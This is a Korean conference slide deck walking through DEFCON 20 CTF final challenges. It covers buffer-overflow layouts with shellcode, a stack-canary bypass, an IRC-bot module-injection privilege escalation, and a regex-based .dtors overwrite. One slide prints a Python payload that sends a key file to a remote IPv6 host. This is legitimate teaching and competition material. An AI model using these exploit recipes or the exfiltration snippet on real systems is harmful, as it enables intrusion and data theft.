[2012 CodeEngn Conference 07] nesk - Defcon 20th : 본선 CTF 문제풀이
2 likes1,842 views
2012 CodeEngn Conference 07 데프콘은 매년 라스베이거스에서 열리는 세계적으로 가장 권위 있는 보안 컨퍼런스 중 하나로 CTF 대회를 진행하고 있다. 올해 데프콘은 특히 20주년을 맞아서 20개팀이 본선에 참가하였으며, 다양한 문제들이 출제되었다. 보통 해킹대회에서의 예선전 풀이는 많지만 본선문제에 관한 정보는 많이 부족하기 때문에 CTF에 출제된 문제중 몇문제를 선정하여 풀이한다. http://codeengn.com/conference/07
![+clientmain()
func rand2(arg) -> rand() % arg1
stage1(sockfd, [4096 <= x < 6144], [5 <= x < 9])](https://image.slidesharecdn.com/20127thcodeengnneskdefcon20thctf-121203140600-phpapp02/85/2012-CodeEngn-Conference-07-nesk-Defcon-20th-CTF-11-320.jpg)
![+stage1()
jmpesp_addr = 0xffe4
[ jmp esp]](https://image.slidesharecdn.com/20127thcodeengnneskdefcon20thctf-121203140600-phpapp02/85/2012-CodeEngn-Conference-07-nesk-Defcon-20th-CTF-15-320.jpg)
![+exploit()
Simple !
["The first 500 bytes of ~~" 주소값 파싱]
[shellcode][ret * X]
2048바이트만큼 전송](https://image.slidesharecdn.com/20127thcodeengnneskdefcon20thctf-121203140600-phpapp02/85/2012-CodeEngn-Conference-07-nesk-Defcon-20th-CTF-27-320.jpg)
![+exploit
NOP * 15
[banner][xffxffx00x00][NOP*X][shellcode]](https://image.slidesharecdn.com/20127thcodeengnneskdefcon20thctf-121203140600-phpapp02/85/2012-CodeEngn-Conference-07-nesk-Defcon-20th-CTF-41-320.jpg)
![+runCommand
[USER] PRIVMSG #eip : ![command] [arg]](https://image.slidesharecdn.com/20127thcodeengnneskdefcon20thctf-121203140600-phpapp02/85/2012-CodeEngn-Conference-07-nesk-Defcon-20th-CTF-47-320.jpg)
![+shellcode ?
from socket import *
sock = socket(AF_INET6, SOCK_STREAM)
sock.connect(('dc20:c7f:2012:13::2', 31337))
sock.write(open('k'+'ey','rb').read())
+exploit
join #eip
MODE #eip
PRIVMSG #eip :!_makeit -1
PRIVMSG #eip :!messages exp.py [SHELLCODE]
PRIVMSG #eip :!_addit exp
PRIVMSG #eip :!reload](https://image.slidesharecdn.com/20127thcodeengnneskdefcon20thctf-121203140600-phpapp02/85/2012-CodeEngn-Conference-07-nesk-Defcon-20th-CTF-54-320.jpg)
![+clientmain
32바이트중 남은 8바이트를 전송
ex) str[0:16]+str[24:32]](https://image.slidesharecdn.com/20127thcodeengnneskdefcon20thctf-121203140600-phpapp02/85/2012-CodeEngn-Conference-07-nesk-Defcon-20th-CTF-64-320.jpg)
![+exploit
buffer[1024] 0xbfbfe474 > NOP
+
SHELLCODE
buf4(ebp-0x374) > 0xffff....
count(ebp-0x370) > 0x?? ....
0x????????
canary(ebp-0x36c) >
.........
clientmain RET
0x374의 값을 양수로 변경
이후 count를 canary 이후로 이동하도록 변경](https://image.slidesharecdn.com/20127thcodeengnneskdefcon20thctf-121203140600-phpapp02/85/2012-CodeEngn-Conference-07-nesk-Defcon-20th-CTF-72-320.jpg)
![+addmsgstruct([buf addr], msg1, msg2)
링크드리스트
struct msg{
char buf[1024];
struct *nextaddr;
}](https://image.slidesharecdn.com/20127thcodeengnneskdefcon20thctf-121203140600-phpapp02/85/2012-CodeEngn-Conference-07-nesk-Defcon-20th-CTF-78-320.jpg)
![+addmsgstruct()
메시지 크기가 512보다 크다면 자름
memcpy(buf[0:512], msg1)](https://image.slidesharecdn.com/20127thcodeengnneskdefcon20thctf-121203140600-phpapp02/85/2012-CodeEngn-Conference-07-nesk-Defcon-20th-CTF-79-320.jpg)
![+addmsgstruct()
memcpy(buf[512:1024], msg2)
struct msg{
char msg1[512];
char msg2[512];
struct *nextaddr;
}](https://image.slidesharecdn.com/20127thcodeengnneskdefcon20thctf-121203140600-phpapp02/85/2012-CodeEngn-Conference-07-nesk-Defcon-20th-CTF-80-320.jpg)
![+func stirsemem()
문자가 / 로 시작하는지 체크
‘/’이후 문자열을 pbuf100 변수에 저장
[/pbuf100]](https://image.slidesharecdn.com/20127thcodeengnneskdefcon20thctf-121203140600-phpapp02/85/2012-CodeEngn-Conference-07-nesk-Defcon-20th-CTF-90-320.jpg)
![+func stirsemem()
다음 ‘/’ 가 나올때까지 루프
v12 에는 두번째 문자열이 들어간다
[/pbuf100/v12]](https://image.slidesharecdn.com/20127thcodeengnneskdefcon20thctf-121203140600-phpapp02/85/2012-CodeEngn-Conference-07-nesk-Defcon-20th-CTF-91-320.jpg)
![+exploit
struct msg{
char msg1[512];
char msg2[512];
struct *nextaddr;
}
2번째 메시지를 통해서 strcat으로 nextaddr를 조작
addsemem()을 한번더 호출해서 nextaddr가 가리키는
메모리 조작가능](https://image.slidesharecdn.com/20127thcodeengnneskdefcon20thctf-121203140600-phpapp02/85/2012-CodeEngn-Conference-07-nesk-Defcon-20th-CTF-99-320.jpg)
![+exploit
메뉴 add semem
메시지 1 : [NOP + SHELLCODE]
메시지 2 : [‘A’*511 + ‘b’]
메뉴 stirsemem
바꿀 메뉴 : 7 (추가한 메뉴)
바꿀 메시지 : 1 (2번째 메시지)
정규식 : /b/Ax10x10x12x08 (.dtors + 4)
메뉴 stirsemem
바꿀 메뉴 : 8 (.dtors + 4 부분)
바꿀 메시지 : 0
정규식 : /[^1]{4}/x10x59x42x28 (RET)
(4바이트 무조건 매칭)](https://image.slidesharecdn.com/20127thcodeengnneskdefcon20thctf-121203140600-phpapp02/85/2012-CodeEngn-Conference-07-nesk-Defcon-20th-CTF-101-320.jpg)
![+QUIZ TIME!
정적 링크된 바이너리의 심볼을 복구하는 IDA PLUGIN?
- GrayResolve
IP v6 주소 “dc20:c7f:2012:13::2” 랑 같으려면 ?
- dc20:c7f:2012:13:[ ]:[ ]:[ ]:2
- dc20:c7f:2012:13:[ 0 ]:[ 0 ]:[ 0 ]:2](https://image.slidesharecdn.com/20127thcodeengnneskdefcon20thctf-121203140600-phpapp02/85/2012-CodeEngn-Conference-07-nesk-Defcon-20th-CTF-103-320.jpg)
[2012 CodeEngn Conference 07] nesk - Defcon 20th : 본선 CTF 문제풀이
- 1. DEFCON 20 CTF FINAL 정재훈([email protected]) wowhacker Best of the Best 1기 www.CodeEngn.com 7th CodeEngn ReverseEngineering Conference
- 2. 1 . CTF FINAL 2 . nssds 3 . mixology 4 . torqux 5 . coney 6 . semem
- 3. +CTF FINAL 20주년 기념 20개팀 본선
- 4. + Winner ! Samurai CTF
- 6. +nssds
- 7. +CTF 바이너리 http://ctftime.org/event/26/tasks/
- 8. +Setting IPv6 dc20:c7f:2012:13::2 +네트워크 인터페이스 변경
- 9. +nssds +기본 데몬 구조 user : nssds port : 54339
- 10. +daemonize() arg2 = main challenge function
- 11. +clientmain() func rand2(arg) -> rand() % arg1 stage1(sockfd, [4096 <= x < 6144], [5 <= x < 9])
- 12. +stage1()
- 13. +stage1() 2 ~ 4사이의 랜덤 루프
- 14. +stage1() 랜덤한 영역의 랜덤위치
- 15. +stage1() jmpesp_addr = 0xffe4 [ jmp esp]
- 16. +stage1() stage1() 은 arg2가 0일때까지 반복 jmpesp_addr 변수에 값 설정
- 17. +stage2() 5 : print_eip() : 현재 eip 출력 4 : print_banner() : 문자열출력
- 18. +stage2() 3 : print_bufcopy() : 할당한메모리영역 주소 출력 2 : print_bufstart() : recv()로 받을 스택버퍼 주소 출력 1 : print_esp() : jmpesp_addr의 주소출력
- 19. +stage2() 0 : print_sockfd : 현재 소켓 디스크립터 출력 +골라먹는재미!
- 21. +stage2() 2048 바이트 만큼 recv()
- 22. +stage2() 버퍼는 대략 1024바이트 *recv에서 2048만큼 받으므로 오버플로우 발생
- 23. +print_bufcopy() 500바이트까지 할당된 메모리에 복사되므로 리턴주소를 구할필요가 없음
- 24. +stage2() 복사한 버퍼에 있는 문자열 체크
- 25. +sub_8049420() 오버플로우가 일어남 -> 루틴을 분석할 필요 X
- 26. +sub_8049420() 다른데몬에서도 같이 사용되는 함수 -> 낚시용?
- 27. +exploit() Simple ! ["The first 500 bytes of ~~" 주소값 파싱] [shellcode][ret * X] 2048바이트만큼 전송
- 28. +mixology
- 29. +mixology user : mixology port : 35575
- 30. +clientmain() 문자열 체크
- 31. +stage1() 받은 정수 + 4만큼의 버퍼할당
- 32. +stage1() 할당된버퍼+4 위치부터 크기만큼 데이터받음
- 34. +stage1() send() 함수가 실패할 때 까지 루프
- 36. +stage1() 리턴값을 버퍼 첫 4바이트에 저장
- 37. +stage1() *버퍼 주소 대상 실행
- 38. +exploit 보낸버퍼가 실행되니 쉘코드만 전송한다면 성공! 앞 4바이트가 쉘코드에 영향을 미치지 않으면서 실행가능한 명령어가 되어야됨
- 39. +somehash() ?
- 40. +exploit 적절한 opcode가 나올때까지 NOP를 늘린다 NOP * 1 *2, *3 .....
- 41. +exploit NOP * 15 [banner][xffxffx00x00][NOP*X][shellcode]
- 42. +torqux
- 43. +torqux user : torqux +uncompyle2 python 2.7 버전에서만 사용가능 https://github.com/wibiti/uncompyle2
- 44. +this is not the daemon you’re looking for +IRC BOT !
- 45. +Setting server 7번 IRC 서버에 접속
- 46. +wutwut IRC 채널 : #eip 봇네임 : riprelative restrictedCommand ?
- 47. +runCommand [USER] PRIVMSG #eip : ![command] [arg]
- 48. +runCommand ‘key’는 무조건 필터링
- 49. +restrictedCommand ? *파일쓰기기능 ?! *config리스트에 명시된 모듈을 전부 로드
- 50. +restrictedCommand 인증함수가 실패하면 명령어 실행불가 +_authorized admins는 config에 기본적으로 존재하지 않음 = admins는 어딘가에서 추가가능하다
- 51. +levelup 명령어를 실행한 유저가 admins 값을 추가할 수 있다 admins가 존재한다면 userLevel은 해당 값으로 설정
- 52. +levelup userLevel > 1000이거나 command의 키값보다 userLevel이 크면 False +Command !_makeit -1
- 53. +exploit key가 필터링 되기때문에 직접적인 키입력, 수정은불가능 message로 py 모듈 작성 _addit 명령어를 통한 모듈 추가 모듈 reload
- 54. +shellcode ? from socket import * sock = socket(AF_INET6, SOCK_STREAM) sock.connect(('dc20:c7f:2012:13::2', 31337)) sock.write(open('k'+'ey','rb').read()) +exploit join #eip MODE #eip PRIVMSG #eip :!_makeit -1 PRIVMSG #eip :!messages exp.py [SHELLCODE] PRIVMSG #eip :!_addit exp PRIVMSG #eip :!reload
- 55. +coney
- 56. +coney user : coney port : 65214
- 58. +clientmain 스택값 검사를 위한 4바이트의 랜덤값 저장
- 59. +clientmain 32바이트 크기의 난수생성
- 60. +clientmain 생성된 난수에서 16바이트만 전송
- 61. +clientmain 아이피를 입력받음 ex) dc20:c7f:2012:13::2 == dc20:c7f:2012:13:0:0:0:2
- 62. +clientmain uprandsend(“아이피”, 2001 ~ 48001, 랜덤32자, 24)
- 63. +uprandsend udp프로토콜로 랜덤한 포트로 문자열중 24자리 전송
- 64. +clientmain 32바이트중 남은 8바이트를 전송 ex) str[0:16]+str[24:32]
- 65. + listen on random port? freebsd에서 지원하는 pf(packet filter) 랜덤한 범위의 포트를 한곳으로 모두 리다이렉션한다
- 66. +clientmain 기존의 랜덤 32 바이트문자열이랑 recv버퍼를 비교
- 67. +clientmain *추가로 4바이트 recv() 엔디안 정렬
- 68. +clientmain 받은크기가 1024이하라면 0x2a로 xor연산후 버퍼에 저장
- 69. +clientmain 스택에 저장된 값이다르다면 종료
- 70. +where is the hole? 받은 4바이트 메모리는 음수로 인식 해당 값이 0이여야지만 루프 탈출
- 71. +exploit 문제점 1. 음수 값의 루프 2. 스택 쿠키 체크 우회? 변수를 덮으면 해결가능 !
- 72. +exploit buffer[1024] 0xbfbfe474 > NOP + SHELLCODE buf4(ebp-0x374) > 0xffff.... count(ebp-0x370) > 0x?? .... 0x???????? canary(ebp-0x36c) > ......... clientmain RET 0x374의 값을 양수로 변경 이후 count를 canary 이후로 이동하도록 변경
- 73. +semem
- 74. +semem user : semem port : 6941 +정적 링크 바이너리 http://codeengn.com/2008-2nd-codeengn-conference/ IDA 플러그인 GrayResolve
- 75. +심볼복구
- 76. +clientmain()
- 78. +addmsgstruct([buf addr], msg1, msg2) 링크드리스트 struct msg{ char buf[1024]; struct *nextaddr; }
- 79. +addmsgstruct() 메시지 크기가 512보다 크다면 자름 memcpy(buf[0:512], msg1)
- 80. +addmsgstruct() memcpy(buf[512:1024], msg2) struct msg{ char msg1[512]; char msg2[512]; struct *nextaddr; }
- 82. +clientmain() 선택한메뉴에 함수 주소에따라 호출
- 83. +clientmain() addsemem 메뉴를 선택했다면 menuflag = 5
- 84. +func addsemem() 1023바이트만큼 2번 메시지를 받아서 addmsgstruct()를 호출해 임의의 메시지 추가
- 85. +func stirsemem() 바꿀 메뉴 버퍼를 선택
- 86. +func stirsemem() 메시지 1, 2 선택
- 87. +func stirsemem() 업데이트할 메시지를 새로받음
- 88. +func stirsemem() 버퍼 끝자리가 공백 문자인지 체크 후 공백 문자 제거
- 89. +func stirsemem() 첫번째부터 루프 -> 공백 문자 제거
- 90. +func stirsemem() 문자가 / 로 시작하는지 체크 ‘/’이후 문자열을 pbuf100 변수에 저장 [/pbuf100]
- 91. +func stirsemem() 다음 ‘/’ 가 나올때까지 루프 v12 에는 두번째 문자열이 들어간다 [/pbuf100/v12]
- 92. +func stirsemem() 2번째 문자열이 g 로 끝난다면 flag를 셋팅
- 93. +func stirsemem() 문자열에 마지막까지 / 가있는지 검사한후 제거
- 94. +func stirsemem() sub_80554d0() ?? hexray 된 pseudo code가 600줄이 넘음 -함수내부에서 문자열 발견
- 95. +Google knows everything PCRE 라이브러리 함수 /usr/local/lib/libpcre.a 추가 +pcre_compile(*pattern,options,**errptr,*erroffset,*ta bleptr) 패턴 지정 함수 +pcre_exec(pcre *code, pcre_extra *extra, *subject, length, startoffset, options, ovector,ovecsize) 정규식 매칭 함수
- 96. +func stirsemem() 첫번째 / 사이에 있는 문자열을 검색 정규식 컴파일
- 97. +func stirsemem() 대체문자열(v12)로 교체 남은 문자열을 붙임(v18) *strcat 함수는 길이검사를 하지않음
- 98. +func stirsemem() g 플래그가 0이아니라면 계속 정규식 매칭
- 99. +exploit struct msg{ char msg1[512]; char msg2[512]; struct *nextaddr; } 2번째 메시지를 통해서 strcat으로 nextaddr를 조작 addsemem()을 한번더 호출해서 nextaddr가 가리키는 메모리 조작가능
- 100. +exploit 정규표현식을 포맷스트링버그처럼 사용할 수 있게됨 .dtors + 4 를 리턴으로 덮어서 쉘코드실행
- 101. +exploit 메뉴 add semem 메시지 1 : [NOP + SHELLCODE] 메시지 2 : [‘A’*511 + ‘b’] 메뉴 stirsemem 바꿀 메뉴 : 7 (추가한 메뉴) 바꿀 메시지 : 1 (2번째 메시지) 정규식 : /b/Ax10x10x12x08 (.dtors + 4) 메뉴 stirsemem 바꿀 메뉴 : 8 (.dtors + 4 부분) 바꿀 메시지 : 0 정규식 : /[^1]{4}/x10x59x42x28 (RET) (4바이트 무조건 매칭)
- 102. +QUIZ TIME!
- 103. +QUIZ TIME! 정적 링크된 바이너리의 심볼을 복구하는 IDA PLUGIN? - GrayResolve IP v6 주소 “dc20:c7f:2012:13::2” 랑 같으려면 ? - dc20:c7f:2012:13:[ ]:[ ]:[ ]:2 - dc20:c7f:2012:13:[ 0 ]:[ 0 ]:[ 0 ]:2
- 104. THANK YOU FOR LISTENING 질문은 지식인에 www.CodeEngn.com 7th CodeEngn ReverseEngineering Conference